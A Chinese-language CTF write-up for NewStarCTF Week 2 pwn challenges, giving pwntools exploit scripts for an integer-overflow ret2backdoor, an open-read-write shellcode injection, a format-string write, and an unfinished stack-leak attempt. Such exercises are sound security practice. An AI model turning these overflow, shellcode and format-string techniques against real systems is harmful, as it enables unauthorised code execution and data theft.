NewStarCTFWEEK2
uint32 and ret:
就是个负数转无符号会变为一个很大的数,就能溢出,然后太大也不行read不了,找一下64位无符号int是多少,然后对应减掉一点,用gdb调试一下就知道了,还有就是用ret调一下
from pwn import *
local_file = './uint'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = '/lib/x86_64-linux-gnu/libc.so.6'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',25835 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
def debug(cmd=''):
gdb.attach(r,cmd)
#------------------------
ret=0x40101a
backdoor=0x4011b6
sl(str(4294967094))
#debug()
sl('a'*0x58+p64(ret)+p64(backdoor))
r.interactive()
shellcode-revenge:
禁用了execve
保护就canary没开
思路:就是第一个read往mmap地址写 (调用read往mmap+21地址写0x800字节函数)的汇编(注:21是因为汇编长度为21),写入orw后会紧接着执行orw语句,
栈溢出跳到mmap
from pwn import *
local_file = './pwn'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = '/lib/x86_64-linux-gnu/libc.so.6'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',25278 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
def debug(cmd=''):
gdb.attach(r,cmd)
#------------------------
mmap=0x233000
se(asm(shellcraft.read(0,mmap+21,0x800)))
print len(asm(shellcraft.read(0,mmap+21,0x800)))
orw_payload=shellcraft.open('./flag')
orw_payload+=shellcraft.read(3,mmap+0x850,0x50)
orw_payload+=shellcraft.write(1,mmap+0x850,0x50)
print(len(orw_payload))
sl('a'*0x38+p64(mmap))
sl(asm(orw_payload))
r.interactive()
砍一刀:
这题有格式化字符串漏洞
偏移为8
所以只要改diamond为10即可
diamond=0x404090
注意64位p64(diamond)要放在后面,不然要被截断
想了很久怎么去交互,这个脚本只能说极小概率成功,多试几次
from pwn import *
local_file = './pwn2'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = '/lib/x86_64-linux-gnu/libc.so.6'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',28562)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
def debug(cmd=''):
gdb.attach(r,cmd)
#------------------------
sl('')
sl('')
sl('666')
sl('')
for i in range(18):
sl('')
for i in range(20):
sl('')
for i in range(100):
sl('%'+'10'+'c%10$n'+'a'*7+p64(0x404090))
r.interactive()
buffer-fly
不会,先记着
from pwn import *
local_file = './buffer_fly'
local_libc = './libc-2.31.so'
remote_libc = './libc-2.31.so'
select = 0
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',25945 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
#------------------------
sea('give me your name: ','a'*0x20)
stack_addr=uu64(ru('\x7f')[-6:])
info('stack_addr',stack_addr)
sl('')
#sea('give me your age: ',str(stack_addr))
#addr=
#info('addr',addr)
#base=stack_addr-libc.sym['_libc_csu_init']
#print hex(base)
sla('susu give me your wechat number: ','a'*0x20+p64(stack_addr)+p64(stack_addr+0x38))
r.interactive()